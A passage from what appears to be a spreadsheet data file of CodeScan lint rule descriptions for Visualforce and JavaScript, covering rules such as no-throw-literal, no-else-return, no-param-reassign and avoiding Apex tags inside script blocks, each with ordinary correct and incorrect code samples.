/*eslint dot-notation: ["error", { "allowPattern": "^[a-z]+(_[a-z]+)+$" }]*/
var data = {};
data.foo_bar = 42;
var data = {};
data["fooBar"] = 42;
var data = {};
data["foo_bar"] = 42; // no warning
&lt;/code&gt;&lt;/pre&gt;</t>
  </si>
  <si>
    <t>cs-vf:no-throw-literal</t>
  </si>
  <si>
    <t>disallow throwing literals as exceptions</t>
  </si>
  <si>
    <t>&lt;p&gt;It is considered good practice to only &lt;code&gt;throw&lt;/code&gt; the &lt;code&gt;Error&lt;/code&gt; object itself or an object using the &lt;code&gt;Error&lt;/code&gt; object as base objects for user-defined exceptions.
The fundamental benefit of &lt;code&gt;Error&lt;/code&gt; objects is that they automatically keep track of where they were built and originated.&lt;/p&gt;
&lt;p&gt;This rule restricts what can be thrown as an exception.  When it was first created, it only prevented literals from being thrown (hence the name), but it has now been expanded to only allow expressions which have a possibility of being an &lt;code&gt;Error&lt;/code&gt; object.&lt;/p&gt;
&lt;h2 id="ruledetails"&gt;Rule Details&lt;/h2&gt;
&lt;p&gt;This rule is aimed at maintaining consistency when throwing exception by disallowing to throw literals and other expressions which cannot possibly be an &lt;code&gt;Error&lt;/code&gt; object.&lt;/p&gt;
&lt;p&gt;Examples of &lt;strong&gt;incorrect&lt;/strong&gt; code for this rule:&lt;/p&gt;
&lt;pre&gt;&lt;code class="js language-js"&gt;/*eslint no-throw-literal: "error"*/
/*eslint-env es6*/
throw "error";
throw 0;
throw undefined;
throw null;
var err = new Error();
throw "an " + err;
// err is recast to a string literal
var err = new Error();
throw `${err}`
&lt;/code&gt;&lt;/pre&gt;
&lt;p&gt;Examples of &lt;strong&gt;correct&lt;/strong&gt; code for this rule:&lt;/p&gt;
&lt;pre&gt;&lt;code class="js language-js"&gt;/*eslint no-throw-literal: "error"*/
throw new Error();
throw new Error("error");
var e = new Error("error");
throw e;
try {
    throw new Error("error");
} catch (e) {
    throw e;
}
&lt;/code&gt;&lt;/pre&gt;
&lt;h2 id="knownlimitations"&gt;Known Limitations&lt;/h2&gt;
&lt;p&gt;Due to the limits of static analysis, this rule cannot guarantee that you will only throw &lt;code&gt;Error&lt;/code&gt; objects.&lt;/p&gt;
&lt;p&gt;Examples of &lt;strong&gt;correct&lt;/strong&gt; code for this rule, but which do not throw an &lt;code&gt;Error&lt;/code&gt; object:&lt;/p&gt;
&lt;pre&gt;&lt;code class="js language-js"&gt;/*eslint no-throw-literal: "error"*/
var err = "error";
throw err;
function foo(bar) {
    console.log(bar);
}
throw foo("error");
throw new String("error");
var foo = {
    bar: "error"
};
throw foo.bar;
&lt;/code&gt;&lt;/pre&gt;</t>
  </si>
  <si>
    <t>cs-vf:handle-callback-err</t>
  </si>
  <si>
    <t>require error handling in callbacks</t>
  </si>
  <si>
    <t>&lt;p&gt;In Node.js, a common pattern for dealing with asynchronous behavior is called the callback pattern.
This pattern expects an &lt;code&gt;Error&lt;/code&gt; object or &lt;code&gt;null&lt;/code&gt; as the first argument of the callback.
Forgetting to handle these errors can lead to some really strange behavior in your application.&lt;/p&gt;
&lt;pre&gt;&lt;code class="js language-js"&gt;function loadData (err, data) {
    doSomething(); // forgot to handle error
}
&lt;/code&gt;&lt;/pre&gt;
&lt;h2 id="ruledetails"&gt;Rule Details&lt;/h2&gt;
&lt;p&gt;This rule expects that when you're using the callback pattern in Node.js you'll handle the error.&lt;/p&gt;
&lt;h2 id="options"&gt;Options&lt;/h2&gt;
&lt;p&gt;The rule takes a single string option: the name of the error parameter. The default is &lt;code&gt;"err"&lt;/code&gt;.&lt;/p&gt;
&lt;p&gt;Examples of &lt;strong&gt;incorrect&lt;/strong&gt; code for this rule with the default &lt;code&gt;"err"&lt;/code&gt; parameter name:&lt;/p&gt;
&lt;pre&gt;&lt;code class="js language-js"&gt;/*eslint handle-callback-err: "error"*/
function loadData (err, data) {
    doSomething();
}
&lt;/code&gt;&lt;/pre&gt;
&lt;p&gt;Examples of &lt;strong&gt;correct&lt;/strong&gt; code for this rule with the default &lt;code&gt;"err"&lt;/code&gt; parameter name:&lt;/p&gt;
&lt;pre&gt;&lt;code class="js language-js"&gt;/*eslint handle-callback-err: "error"*/
function loadData (err, data) {
    if (err) {
        console.log(err.stack);
    }
    doSomething();
}
function generateError (err) {
    if (err) {}
}
&lt;/code&gt;&lt;/pre&gt;
&lt;p&gt;Examples of &lt;strong&gt;correct&lt;/strong&gt; code for this rule with a sample &lt;code&gt;"error"&lt;/code&gt; parameter name:&lt;/p&gt;
&lt;pre&gt;&lt;code class="js language-js"&gt;/*eslint handle-callback-err: ["error", "error"]*/
function loadData (error, data) {
    if (error) {
       console.log(error.stack);
    }
    doSomething();
}
&lt;/code&gt;&lt;/pre&gt;
&lt;h3 id="regularexpression"&gt;regular expression&lt;/h3&gt;
&lt;p&gt;Sometimes (especially in big projects) the name of the error variable is not consistent across the project,
so you need a more flexible configuration to ensure that the rule reports all unhandled errors.&lt;/p&gt;
&lt;p&gt;If the configured name of the error variable begins with a &lt;code&gt;^&lt;/code&gt; it is considered to be a regexp pattern.&lt;/p&gt;
&lt;ul&gt;
&lt;li&gt;If the option is &lt;code&gt;"^(err|error|anySpecificError)$"&lt;/code&gt;, the rule reports unhandled errors where the parameter name can be &lt;code&gt;err&lt;/code&gt;, &lt;code&gt;error&lt;/code&gt; or &lt;code&gt;anySpecificError&lt;/code&gt;.&lt;/li&gt;
&lt;li&gt;If the option is &lt;code&gt;"^.+Error$"&lt;/code&gt;, the rule reports unhandled errors where the parameter name ends with &lt;code&gt;Error&lt;/code&gt; (for example, &lt;code&gt;connectionError&lt;/code&gt; or &lt;code&gt;validationError&lt;/code&gt; will match).&lt;/li&gt;
&lt;li&gt;If the option is &lt;code&gt;"^.*(e|E)rr"&lt;/code&gt;, the rule reports unhandled errors where the parameter name matches any string that contains &lt;code&gt;err&lt;/code&gt; or &lt;code&gt;Err&lt;/code&gt; (for example, &lt;code&gt;err&lt;/code&gt;, &lt;code&gt;error&lt;/code&gt;, &lt;code&gt;anyError&lt;/code&gt;, &lt;code&gt;some_err&lt;/code&gt; will match).&lt;/li&gt;
&lt;/ul&gt;
&lt;h2 id="whennottouseit"&gt;When Not To Use It&lt;/h2&gt;
&lt;p&gt;There are cases where it may be safe for your application to ignore errors, however only ignore errors if you are
confident that some other form of monitoring will help you catch the problem.&lt;/p&gt;
&lt;h2 id="furtherreading"&gt;Further Reading&lt;/h2&gt;
&lt;ul&gt;
&lt;li&gt;&lt;a href="https://github.com/maxogden/art-of-node#callbacks"&gt;The Art Of Node: Callbacks&lt;/a&gt;&lt;/li&gt;
&lt;li&gt;&lt;a href="https://docs.nodejitsu.com/articles/errors/what-are-the-error-conventions/"&gt;Nodejitsu: What are the error conventions?&lt;/a&gt;&lt;/li&gt;
&lt;/ul&gt;</t>
  </si>
  <si>
    <t>cs-vf:exception</t>
  </si>
  <si>
    <t>Tracks CodeScan Eslint Exceptions</t>
  </si>
  <si>
    <t>&lt;p&gt;Violations of this rule may occur due to parsing errors and other exceptions thrown by the Javascript rule set.  Do not turn this off.&lt;/p&gt;</t>
  </si>
  <si>
    <t>cs-vf:no-new-object</t>
  </si>
  <si>
    <t>disallow `Object` constructors</t>
  </si>
  <si>
    <t>&lt;p&gt;The &lt;code&gt;Object&lt;/code&gt; constructor is used to create new generic objects in JavaScript, such as:&lt;/p&gt;
&lt;pre&gt;&lt;code class="js language-js"&gt;var myObject = new Object();
&lt;/code&gt;&lt;/pre&gt;
&lt;p&gt;However, this is no different from using the more concise object literal syntax:&lt;/p&gt;
&lt;pre&gt;&lt;code class="js language-js"&gt;var myObject = {};
&lt;/code&gt;&lt;/pre&gt;
&lt;p&gt;For this reason, many prefer to always use the object literal syntax and never use the &lt;code&gt;Object&lt;/code&gt; constructor.&lt;/p&gt;
&lt;p&gt;While there are no performance differences between the two approaches, the byte savings and conciseness of the object literal form is what has made it the de facto way of creating new objects.&lt;/p&gt;
&lt;h2 id="ruledetails"&gt;Rule Details&lt;/h2&gt;
&lt;p&gt;This rule disallows &lt;code&gt;Object&lt;/code&gt; constructors.&lt;/p&gt;
&lt;p&gt;Examples of &lt;strong&gt;incorrect&lt;/strong&gt; code for this rule:&lt;/p&gt;
&lt;pre&gt;&lt;code class="js language-js"&gt;/*eslint no-new-object: "error"*/
var myObject = new Object();
var myObject = new Object;
&lt;/code&gt;&lt;/pre&gt;
&lt;p&gt;Examples of &lt;strong&gt;correct&lt;/strong&gt; code for this rule:&lt;/p&gt;
&lt;pre&gt;&lt;code class="js language-js"&gt;/*eslint no-new-object: "error"*/
var myObject = new CustomObject();
var myObject = {};
&lt;/code&gt;&lt;/pre&gt;
&lt;h2 id="whennottouseit"&gt;When Not To Use It&lt;/h2&gt;
&lt;p&gt;If you wish to allow the use of the &lt;code&gt;Object&lt;/code&gt; constructor, you can safely turn this rule off.&lt;/p&gt;</t>
  </si>
  <si>
    <t>cs-vf:no-else-return</t>
  </si>
  <si>
    <t>disallow `else` blocks after `return` statements in `if` statements</t>
  </si>
  <si>
    <t>&lt;p&gt;If an &lt;code&gt;if&lt;/code&gt; block contains a &lt;code&gt;return&lt;/code&gt; statement, the &lt;code&gt;else&lt;/code&gt; block becomes unnecessary. Its contents can be placed outside of the block.&lt;/p&gt;
&lt;pre&gt;&lt;code class="js language-js"&gt;function foo() {
    if (x) {
        return y;
    } else {
        return z;
    }
}
&lt;/code&gt;&lt;/pre&gt;
&lt;h2 id="ruledetails"&gt;Rule Details&lt;/h2&gt;
&lt;p&gt;This rule is aimed at highlighting an unnecessary block of code following an &lt;code&gt;if&lt;/code&gt; containing a return statement. As such, it will warn when it encounters an &lt;code&gt;else&lt;/code&gt; following a chain of &lt;code&gt;if&lt;/code&gt;s, all of them containing a &lt;code&gt;return&lt;/code&gt; statement.&lt;/p&gt;
&lt;h2 id="options"&gt;Options&lt;/h2&gt;
&lt;p&gt;This rule has an object option:&lt;/p&gt;
&lt;pre&gt;&lt;code class="json language-json"&gt;{
    "no-else-return": ["error", { "allowElseIf": true }],
    // or
    "no-else-return": ["error", { "allowElseIf": false }]
}
&lt;/code&gt;&lt;/pre&gt;
&lt;ul&gt;
&lt;li&gt;&lt;code&gt;allowElseIf: true&lt;/code&gt; (default) allows &lt;code&gt;else if&lt;/code&gt; blocks after a return&lt;/li&gt;
&lt;li&gt;&lt;code&gt;allowElseIf: false&lt;/code&gt; disallows &lt;code&gt;else if&lt;/code&gt; blocks after a return&lt;/li&gt;
&lt;/ul&gt;
&lt;h3 id="allowelseiftrue"&gt;&lt;code&gt;allowElseIf: true&lt;/code&gt;&lt;/h3&gt;
&lt;p&gt;Examples of &lt;strong&gt;incorrect&lt;/strong&gt; code for this rule:&lt;/p&gt;
&lt;pre&gt;&lt;code class="js language-js"&gt;/*eslint no-else-return: "error"*/
function foo() {
    if (x) {
        return y;
    } else {
        return z;
    }
}
function foo() {
    if (x) {
        return y;
    } else if (z) {
        return w;
    } else {
        return t;
    }
}
function foo() {
    if (x) {
        return y;
    } else {
        var t = "foo";
    }
    return t;
}
function foo() {
    if (error) {
        return 'It failed';
    } else {
        if (loading) {
            return "It's still loading";
        }
    }
}
// Two warnings for nested occurrences
function foo() {
    if (x) {
        if (y) {
            return y;
        } else {
            return x;
        }
    } else {
        return z;
    }
}
&lt;/code&gt;&lt;/pre&gt;
&lt;p&gt;Examples of &lt;strong&gt;correct&lt;/strong&gt; code for this rule:&lt;/p&gt;
&lt;pre&gt;&lt;code class="js language-js"&gt;/*eslint no-else-return: "error"*/
function foo() {
    if (x) {
        return y;
    }
    return z;
}
function foo() {
    if (x) {
        return y;
    } else if (z) {
        var t = "foo";
    } else {
        return w;
    }
}
function foo() {
    if (x) {
        if (z) {
            return y;
        }
    } else {
        return z;
    }
}
function foo() {
    if (error) {
        return 'It failed';
    } else if (loading) {
        return "It's still loading";
    }
}
&lt;/code&gt;&lt;/pre&gt;
&lt;h3 id="allowelseiffalse"&gt;&lt;code&gt;allowElseIf: false&lt;/code&gt;&lt;/h3&gt;
&lt;p&gt;Examples of &lt;strong&gt;incorrect&lt;/strong&gt; code for this rule:&lt;/p&gt;
&lt;pre&gt;&lt;code class="js language-js"&gt;/*eslint no-else-return: ["error", {allowElseIf: false}]*/
function foo() {
    if (error) {
        return 'It failed';
    } else if (loading) {
        return "It's still loading";
    }
}
&lt;/code&gt;&lt;/pre&gt;
&lt;p&gt;Examples of &lt;strong&gt;correct&lt;/strong&gt; code for this rule:&lt;/p&gt;
&lt;pre&gt;&lt;code class="js language-js"&gt;/*eslint no-else-return: ["error", {allowElseIf: false}]*/
function foo() {
    if (error) {
        return 'It failed';
    }
    if (loading) {
        return "It's still loading";
    }
}
&lt;/code&gt;&lt;/pre&gt;</t>
  </si>
  <si>
    <t>cs-vf:no-new-wrappers</t>
  </si>
  <si>
    <t>disallow `new` operators with the `String`, `Number`, and `Boolean` objects</t>
  </si>
  <si>
    <t>&lt;p&gt;There are three primitive types in JavaScript that have wrapper objects: string, number, and boolean. These are represented by the constructors &lt;code&gt;String&lt;/code&gt;, &lt;code&gt;Number&lt;/code&gt;, and &lt;code&gt;Boolean&lt;/code&gt;, respectively. The primitive wrapper types are used whenever one of these primitive values is read, providing them with object-like capabilities such as methods. Behind the scenes, an object of the associated wrapper type is created and then destroyed, which is why you can call methods on primitive values, such as:&lt;/p&gt;
&lt;pre&gt;&lt;code class="js language-js"&gt;var text = "Hello world".substring(2);
&lt;/code&gt;&lt;/pre&gt;
&lt;p&gt;Behind the scenes in this example, a &lt;code&gt;String&lt;/code&gt; object is constructed. The &lt;code&gt;substring()&lt;/code&gt; method exists on &lt;code&gt;String.prototype&lt;/code&gt; and so is accessible to the string instance.&lt;/p&gt;
&lt;p&gt;It's also possible to manually create a new wrapper instance:&lt;/p&gt;
&lt;pre&gt;&lt;code class="js language-js"&gt;var stringObject = new String("Hello world");
var numberObject = new Number(33);
var booleanObject = new Boolean(false);
&lt;/code&gt;&lt;/pre&gt;
&lt;p&gt;Although possible, there aren't any good reasons to use these primitive wrappers as constructors. They tend to confuse other developers more than anything else because they seem like they should act as primitives, but they do not. For example:&lt;/p&gt;
&lt;pre&gt;&lt;code class="js language-js"&gt;var stringObject = new String("Hello world");
console.log(typeof stringObject);       // "object"
var text = "Hello world";
console.log(typeof text);               // "string"
var booleanObject = new Boolean(false);
if (booleanObject) {    // all objects are truthy!
    console.log("This executes");
}
&lt;/code&gt;&lt;/pre&gt;
&lt;p&gt;The first problem is that primitive wrapper objects are, in fact, objects. That means &lt;code&gt;typeof&lt;/code&gt; will return &lt;code&gt;"object"&lt;/code&gt; instead of &lt;code&gt;"string"&lt;/code&gt;, &lt;code&gt;"number"&lt;/code&gt;, or &lt;code&gt;"boolean"&lt;/code&gt;. The second problem comes with boolean objects. Every object is truthy, that means an instance of &lt;code&gt;Boolean&lt;/code&gt; always resolves to &lt;code&gt;true&lt;/code&gt; even when its actual value is &lt;code&gt;false&lt;/code&gt;.&lt;/p&gt;
&lt;p&gt;For these reasons, it's considered a best practice to avoid using primitive wrapper types with &lt;code&gt;new&lt;/code&gt;.&lt;/p&gt;
&lt;h2 id="ruledetails"&gt;Rule Details&lt;/h2&gt;
&lt;p&gt;This rule aims to eliminate the use of &lt;code&gt;String&lt;/code&gt;, &lt;code&gt;Number&lt;/code&gt;, and &lt;code&gt;Boolean&lt;/code&gt; with the &lt;code&gt;new&lt;/code&gt; operator. As such, it warns whenever it sees &lt;code&gt;new String&lt;/code&gt;, &lt;code&gt;new Number&lt;/code&gt;, or &lt;code&gt;new Boolean&lt;/code&gt;.&lt;/p&gt;
&lt;p&gt;Examples of &lt;strong&gt;incorrect&lt;/strong&gt; code for this rule:&lt;/p&gt;
&lt;pre&gt;&lt;code class="js language-js"&gt;/*eslint no-new-wrappers: "error"*/
var stringObject = new String("Hello world");
var numberObject = new Number(33);
var booleanObject = new Boolean(false);
var stringObject = new String;
var numberObject = new Number;
var booleanObject = new Boolean;
&lt;/code&gt;&lt;/pre&gt;
&lt;p&gt;Examples of &lt;strong&gt;correct&lt;/strong&gt; code for this rule:&lt;/p&gt;
&lt;pre&gt;&lt;code class="js language-js"&gt;/*eslint no-new-wrappers: "error"*/
var text = String(someValue);
var num = Number(someValue);
var object = new MyString();
&lt;/code&gt;&lt;/pre&gt;
&lt;h2 id="whennottouseit"&gt;When Not To Use It&lt;/h2&gt;
&lt;p&gt;If you want to allow the use of primitive wrapper objects, then you can safely disable this rule.&lt;/p&gt;
&lt;h2 id="furtherreading"&gt;Further Reading&lt;/h2&gt;
&lt;ul&gt;
&lt;li&gt;&lt;a href="https://www.inkling.com/read/javascript-definitive-guide-david-flanagan-6th/chapter-3/wrapper-objects"&gt;Wrapper objects&lt;/a&gt;&lt;/li&gt;
&lt;/ul&gt;</t>
  </si>
  <si>
    <t>cs-vf:no-eq-null</t>
  </si>
  <si>
    <t>disallow `null` comparisons without type-checking operators</t>
  </si>
  <si>
    <t>&lt;p&gt;Comparing to &lt;code&gt;null&lt;/code&gt; without a type-checking operator (&lt;code&gt;==&lt;/code&gt; or &lt;code&gt;!=&lt;/code&gt;), can have unintended results as the comparison will evaluate to true when comparing to not just a &lt;code&gt;null&lt;/code&gt;, but also an &lt;code&gt;undefined&lt;/code&gt; value.&lt;/p&gt;
&lt;pre&gt;&lt;code class="js language-js"&gt;if (foo == null) {
  bar();
}
&lt;/code&gt;&lt;/pre&gt;
&lt;h2 id="ruledetails"&gt;Rule Details&lt;/h2&gt;
&lt;p&gt;The &lt;code&gt;no-eq-null&lt;/code&gt; rule aims reduce potential bug and unwanted behavior by ensuring that comparisons to &lt;code&gt;null&lt;/code&gt; only match &lt;code&gt;null&lt;/code&gt;, and not also &lt;code&gt;undefined&lt;/code&gt;. As such it will flag comparisons to null when using &lt;code&gt;==&lt;/code&gt; and &lt;code&gt;!=&lt;/code&gt;.&lt;/p&gt;
&lt;p&gt;Examples of &lt;strong&gt;incorrect&lt;/strong&gt; code for this rule:&lt;/p&gt;
&lt;pre&gt;&lt;code class="js language-js"&gt;/*eslint no-eq-null: "error"*/
if (foo == null) {
  bar();
}
while (qux != null) {
  baz();
}
&lt;/code&gt;&lt;/pre&gt;
&lt;p&gt;Examples of &lt;strong&gt;correct&lt;/strong&gt; code for this rule:&lt;/p&gt;
&lt;pre&gt;&lt;code class="js language-js"&gt;/*eslint no-eq-null: "error"*/
if (foo === null) {
  bar();
}
while (qux !== null) {
  baz();
}
&lt;/code&gt;&lt;/pre&gt;</t>
  </si>
  <si>
    <t>cs-vf:no-new</t>
  </si>
  <si>
    <t>disallow `new` operators outside of assignments or comparisons</t>
  </si>
  <si>
    <t>&lt;p&gt;The goal of using &lt;code&gt;new&lt;/code&gt; with a constructor is typically to create an object of a particular type and store that object in a variable, such as:&lt;/p&gt;
&lt;pre&gt;&lt;code class="js language-js"&gt;var person = new Person();
&lt;/code&gt;&lt;/pre&gt;
&lt;p&gt;It's less common to use &lt;code&gt;new&lt;/code&gt; and not store the result, such as:&lt;/p&gt;
&lt;pre&gt;&lt;code class="js language-js"&gt;new Person();
&lt;/code&gt;&lt;/pre&gt;
&lt;p&gt;In this case, the created object is thrown away because its reference isn't stored anywhere, and in many cases, this means that the constructor should be replaced with a function that doesn't require &lt;code&gt;new&lt;/code&gt; to be used.&lt;/p&gt;
&lt;h2 id="ruledetails"&gt;Rule Details&lt;/h2&gt;
&lt;p&gt;This rule is aimed at maintaining consistency and convention by disallowing constructor calls using the &lt;code&gt;new&lt;/code&gt; keyword that do not assign the resulting object to a variable.&lt;/p&gt;
&lt;p&gt;Examples of &lt;strong&gt;incorrect&lt;/strong&gt; code for this rule:&lt;/p&gt;
&lt;pre&gt;&lt;code class="js language-js"&gt;/*eslint no-new: "error"*/
new Thing();
&lt;/code&gt;&lt;/pre&gt;
&lt;p&gt;Examples of &lt;strong&gt;correct&lt;/strong&gt; code for this rule:&lt;/p&gt;
&lt;pre&gt;&lt;code class="js language-js"&gt;/*eslint no-new: "error"*/
var thing = new Thing();
Thing();
&lt;/code&gt;&lt;/pre&gt;</t>
  </si>
  <si>
    <t>vf:ItalicTagsCheck</t>
  </si>
  <si>
    <t>"em" Tags Should Be Used Instead of "i"</t>
  </si>
  <si>
    <t>&lt;p&gt;
The &amp;lt;strong&amp;gt;/&amp;lt;b&amp;gt; and &amp;lt;em&amp;gt;/&amp;lt;i&amp;gt; tags have exactly the same effect in most web browsers, but there is a fundamental difference between them: &amp;lt;strong&amp;gt; and &amp;lt;em&amp;gt; have a semantic meaning whereas &amp;lt;b&amp;gt; and &amp;lt;i&amp;gt; only convey styling information like CSS.
&lt;/p&gt;
&lt;p&gt;
When &amp;lt;b&amp;gt; can have simply no effect on a Palm device with limited display or when a screen reader software is used by a blind person, &amp;lt;strong&amp;gt; will:
&lt;/p&gt;
&lt;ul&gt;
  &lt;li&gt;Underline the characters on a Palm Pilot&lt;/li&gt;
  &lt;li&gt;Speak with lower tone when using a screen reader such as Jaws&lt;/li&gt;
  &lt;li&gt;And display the text bold in normal browsers&lt;/li&gt;
&lt;/ul&gt;
&lt;p&gt;Consequently:&lt;/p&gt;
&lt;ul&gt;
  &lt;li&gt;in order to convey semantics, the &amp;lt;b&amp;gt; and &amp;lt;i&amp;gt; tags shall never be used,&lt;/li&gt;
  &lt;li&gt;in order to convey styling information, the &amp;lt;b&amp;gt; and &amp;lt;i&amp;gt; should be avoided and CSS should be used instead.&lt;/li&gt;
&lt;/ul&gt;
&lt;h2&gt;Noncompliant Code Example&lt;/h2&gt;
&lt;pre&gt;
&amp;lt;i&amp;gt;car&amp;lt;/i&amp;gt;                 //Bad: this is not recommended.
&amp;lt;b&amp;gt;train&amp;lt;/b&amp;gt;               //Bad: this is not recommended.
&lt;/pre&gt;
&lt;h2&gt;Compliant Solution&lt;/h2&gt;
&lt;pre&gt;
&amp;lt;em&amp;gt;car&amp;lt;/em&amp;gt;               //Good: this is preferred.
&amp;lt;strong&amp;gt;train&amp;lt;/strong&amp;gt;     //Good: this is preferred.
&lt;/pre&gt;</t>
  </si>
  <si>
    <t>cs-vf:no-param-reassign</t>
  </si>
  <si>
    <t>disallow reassigning `function` parameters</t>
  </si>
  <si>
    <t>&lt;h1 id="disallowreassignmentoffunctionparametersnoparamreassign"&gt;Disallow Reassignment of Function Parameters (no-param-reassign)&lt;/h1&gt;
&lt;p&gt;Assignment to variables declared as function parameters can be misleading and lead to confusing behavior, as modifying function parameters will also mutate the &lt;code&gt;arguments&lt;/code&gt; object. Often, assignment to function parameters is unintended and indicative of a mistake or programmer error.&lt;/p&gt;
&lt;p&gt;This rule can be also configured to fail when function parameters are modified. Side effects on parameters can cause counter-intuitive execution flow and make errors difficult to track down.&lt;/p&gt;
&lt;h2 id="ruledetails"&gt;Rule Details&lt;/h2&gt;
&lt;p&gt;This rule aims to prevent unintended behavior caused by modification or reassignment of function parameters.&lt;/p&gt;
&lt;p&gt;Examples of &lt;strong&gt;incorrect&lt;/strong&gt; code for this rule:&lt;/p&gt;
&lt;pre&gt;&lt;code class="js language-js"&gt;/*eslint no-param-reassign: "error"*/
function foo(bar) {
    bar = 13;
}
function foo(bar) {
    bar++;
}
&lt;/code&gt;&lt;/pre&gt;
&lt;p&gt;Examples of &lt;strong&gt;correct&lt;/strong&gt; code for this rule:&lt;/p&gt;
&lt;pre&gt;&lt;code class="js language-js"&gt;/*eslint no-param-reassign: "error"*/
function foo(bar) {
    var baz = bar;
}
&lt;/code&gt;&lt;/pre&gt;
&lt;h2 id="options"&gt;Options&lt;/h2&gt;
&lt;p&gt;This rule takes one option, an object, with a boolean property &lt;code&gt;"props"&lt;/code&gt; and an array &lt;code&gt;"ignorePropertyModificationsFor"&lt;/code&gt;. &lt;code&gt;"props"&lt;/code&gt; is &lt;code&gt;false&lt;/code&gt; by default. If &lt;code&gt;"props"&lt;/code&gt; is set to &lt;code&gt;true&lt;/code&gt;, this rule warns against the modification of parameter properties unless they're included in &lt;code&gt;"ignorePropertyModificationsFor"&lt;/code&gt;, which is an empty array by default.&lt;/p&gt;
&lt;h3 id="props"&gt;props&lt;/h3&gt;
&lt;p&gt;Examples of &lt;strong&gt;correct&lt;/strong&gt; code for the default &lt;code&gt;{ "props": false }&lt;/code&gt; option:&lt;/p&gt;
&lt;pre&gt;&lt;code class="js language-js"&gt;/*eslint no-param-reassign: ["error", { "props": false }]*/
function foo(bar) {
    bar.prop = "value";
}
function foo(bar) {
    delete bar.aaa;
}
function foo(bar) {
    bar.aaa++;
}
&lt;/code&gt;&lt;/pre&gt;
&lt;p&gt;Examples of &lt;strong&gt;incorrect&lt;/strong&gt; code for the &lt;code&gt;{ "props": true }&lt;/code&gt; option:&lt;/p&gt;
&lt;pre&gt;&lt;code class="js language-js"&gt;/*eslint no-param-reassign: ["error", { "props": true }]*/
function foo(bar) {
    bar.prop = "value";
}
function foo(bar) {
    delete bar.aaa;
}
function foo(bar) {
    bar.aaa++;
}
&lt;/code&gt;&lt;/pre&gt;
&lt;p&gt;Examples of &lt;strong&gt;correct&lt;/strong&gt; code for the &lt;code&gt;{ "props": true }&lt;/code&gt; option with &lt;code&gt;"ignorePropertyModificationsFor"&lt;/code&gt; set:&lt;/p&gt;
&lt;pre&gt;&lt;code class="js language-js"&gt;/*eslint no-param-reassign: ["error", { "props": true, "ignorePropertyModificationsFor": ["bar"] }]*/
function foo(bar) {
    bar.prop = "value";
}
function foo(bar) {
    delete bar.aaa;
}
function foo(bar) {
    bar.aaa++;
}
&lt;/code&gt;&lt;/pre&gt;
&lt;h2 id="whennottouseit"&gt;When Not To Use It&lt;/h2&gt;
&lt;p&gt;If you want to allow assignment to function parameters, then you can safely disable this rule.&lt;/p&gt;
&lt;h2 id="furtherreading"&gt;Further Reading&lt;/h2&gt;
&lt;ul&gt;
&lt;li&gt;&lt;a href="https://spin.atomicobject.com/2011/04/10/javascript-don-t-reassign-your-function-arguments/"&gt;JavaScript: Donâ€™t Reassign Your Function Arguments&lt;/a&gt;&lt;/li&gt;
&lt;/ul&gt;</t>
  </si>
  <si>
    <t>vf:HeaderCheck</t>
  </si>
  <si>
    <t>Files Should Have a Header Comment</t>
  </si>
  <si>
    <t>This rule verifies files have a comment matching a given regular expression before the very first tag.
The header comment can be located before or after the &lt;code&gt;&amp;lt;!DOCTYPE&amp;gt;&lt;/code&gt; declaration.
&lt;p&gt;For example, with the format &lt;code&gt;.*Copyright.*&lt;/code&gt;, the following code:&lt;/p&gt;
&lt;pre&gt;
&amp;lt;html&amp;gt;                                    //Bad: not recommended.
...
&amp;lt;/html&amp;gt;
&lt;/pre&gt;
&lt;p&gt;should be refactored into:&lt;/p&gt;
&lt;pre&gt;
&amp;lt;!-- Copyright 2013 SonarSource SA --&amp;gt;    //Good: preferred approach.
&amp;lt;html&amp;gt;
...
&amp;lt;/html&amp;gt;
&lt;/pre&gt;</t>
  </si>
  <si>
    <t>vf:AvoidApexInScript</t>
  </si>
  <si>
    <t>Avoid Apex Tags Within Script</t>
  </si>
  <si>
    <t>Avoid using &amp;lt;apex:*&amp;gt; tags within &amp;lt;script&amp;gt; tags. &amp;lt;apex:&amp;gt; tags should be avoided for the following reasons:&lt;br/&gt;
&lt;ul&gt;
	&lt;li&gt;The code is harder to read&lt;/li&gt;
	&lt;li&gt;CodeScan's javascript linter cannot parse the code properly&lt;/li&gt; 
	&lt;li&gt;&amp;lt;apex:output&amp;gt; cannot be controlled for security&lt;/li&gt;
&lt;/ul&gt;  
   &lt;BR&gt;&lt;h2&gt;Example:&lt;/h2&gt;&lt;pre&gt;
&amp;lt;apex:page&amp;gt;
  &amp;lt;script&amp;gt;
    &amp;lt;apex:repeat value="{! apexArray }" var="entry"&amp;gt;      //Bad: Apex tag is used within Script to iterate through array.
      document.write('{! JSENCODE(entry) }');
    &amp;lt;/apex:repeat&amp;gt;
  &amp;lt;/script&amp;gt;
  &amp;lt;script&amp;gt;
   var apexArray = JSON.parse('{! JSENCODE(apexArray) }');
   if(Array.isArray(apexArray)) apexArray.forEach(function(entry){ document.write(entry) });  //Good: Iteration is provided without using Apex tags.
  &amp;lt;/script&amp;gt;
&amp;lt;/apex:page&amp;gt;
&lt;/pre&gt;</t>
  </si>
  <si>
    <t>vf:LongJavaScriptCheck</t>
  </si>
  <si>
    <t>Avoid Large Javascript Scriptlets</t>
  </si>
  <si>
    <t>Javascript scriptlets should not have too many lines of code. Such long Javascript pieces of code should be located in dedicated *.js source files.
    &lt;BR&gt;&lt;h2&gt;Example:&lt;/h2&gt;&lt;pre&gt;
   &amp;lt;script type="text/javascript"&amp;gt;
      Sfdc.onReady(function() {
      var id = '{!$Component.myForm.myPageBlock.myField}';  //Bad: too many lines of javascript is not recommended.
      var inputField = document.getElementById(id);
      console.log(inputField.value);
      //...
      //...
      //...
    });
  &amp;lt;/script&amp;gt;
      &lt;/pre&gt;</t>
  </si>
  <si>
    <t>cs-vf:no-func-assign</t>
  </si>
  <si>
    <t>disallow reassigning `function` declarations</t>
  </si>
  <si>
    <t>&lt;p&gt;JavaScript functions can be written as a FunctionDeclaration &lt;code&gt;function foo() { ... }&lt;/code&gt; or as a FunctionExpression &lt;code&gt;var foo = function() { ... };&lt;/code&gt;. While a JavaScript interpreter might tolerate it, overwriting/reassigning a function written as a FunctionDeclaration is often indicative of a mistake or issue.&lt;/p&gt;
&lt;pre&gt;&lt;code class="js language-js"&gt;function foo() {}
foo = bar;
&lt;/code&gt;&lt;/pre&gt;
&lt;h2 id="ruledetails"&gt;Rule Details&lt;/h2&gt;
&lt;p&gt;This rule disallows reassigning &lt;code&gt;function&lt;/code&gt; declarations.&lt;/p&gt;
&lt;p&gt;Examples of &lt;strong&gt;incorrect&lt;/strong&gt; code for this rule:&lt;/p&gt;
